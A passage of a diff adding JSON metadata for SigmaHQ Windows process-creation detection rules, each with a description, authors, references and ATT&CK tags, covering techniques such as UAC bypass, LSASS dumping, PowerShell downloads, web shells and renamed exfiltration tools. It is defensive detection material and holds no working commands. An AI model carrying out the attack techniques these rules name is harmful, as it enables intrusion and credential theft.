scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_wmic_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "value": "WMIC Unquoted Services Path Lookup" + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews" + }, + { + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_adfind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.joeware.net/freetools/tools/adfind/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "value": "Renamed AdFind Detection" + }, + { + "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/22", + "falsepositive": [ + "Software that illegaly integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" + ], + "filename": "proc_creation_win_renamed_megasync.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/rclone-mega-extortion/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "value": "Renamed MegaSync" + }, + { + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/28", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_reg_add_run_key.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", + "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", + "value": "Reg Add RUN Key" + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_babyshark.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + 
"attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity" + }, + { + "description": "Detects suspicious process run from unusual locations", + "meta": { + "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_run_locations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-05-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ] + }, + "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "value": "Suspicious Process Start Locations" + }, + { + "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_from_zip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "1a70042a-6622-4a2b-8958-267625349abf", + "value": "Run from a Zip File" + }, + { + "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdbinst_shim_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" + ] + }, + "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", + "value": "Possible Shim Database Persistence via sdbinst.exe" + }, + { + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_php_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://www.php.net/manual/en/features.commandline.php", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "value": "Php Inline Command Execution" + }, + { + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_raspberry_robin_single_dot_ending_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "value": "Raspberry Robin Dot Ending File" + }, + { + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "filename": "proc_creation_win_susp_rar_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/bash/rar.html", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level" + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_regsvr32_no_dll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ] + }, + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line Without DLL" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_blue_mockingbird.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "value": "Blue Mockingbird" + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly" + }, + { + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "value": "Suspicious Regsvr32 Execution From Remote Share" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" + }, + { + "description": "Detects suspicious command line in 
which a user gets added to the local Remote Desktop Users group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ] + }, + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group" + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "meta": { + "author": "Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ] + }, + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification" + }, + { + "description": "Detects a Powershell process that contains download commands in its command line string", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": 
"2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", + "value": "PowerShell Download from URL" + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysnative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ] + }, + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder" + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": 
"Suspicious GrpConv Execution" + }, + { + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "value": "WMI Backdoor Exchange Transport Agent" + }, + { + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_rurat.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ] + }, + "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "value": "Execution of Renamed Remote Utilities RAT (RURAT)" + }, + { + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by 
hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "proc_creation_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", + "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + }, + { + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "meta": { + "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Particular web applications may spawn a shell process legitimately" + ], + "filename": "proc_creation_win_webshell_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1190" + ] + }, + "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", + "value": "Shells Spawned by Web Servers" + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/12", + "falsepositive": [ + "Unknown" + ], + 
"filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process" + }, + { + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_install_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.t1218.007" + ] + }, + "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "value": "Suspicious Msiexec Quiet Install From Remote Location" + }, + { + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "filename": "proc_creation_win_susp_explorer.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe" + }, + { + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_createminidump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "value": "CreateMiniDump Hacktool" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + 
"meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_netsh_discovery_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "value": "Suspicious Netsh Discovery Command" + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", 
+ "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner" + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "meta": { + "author": "Elastic (idea), Tobias Michalski", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service" + }, + { + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_get_clipboard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "value": "PowerShell Get-Clipboard Cmdlet Via CLI" + }, + { + "description": 
"Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/30", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_expand_cabinet_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion" + }, + { + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": 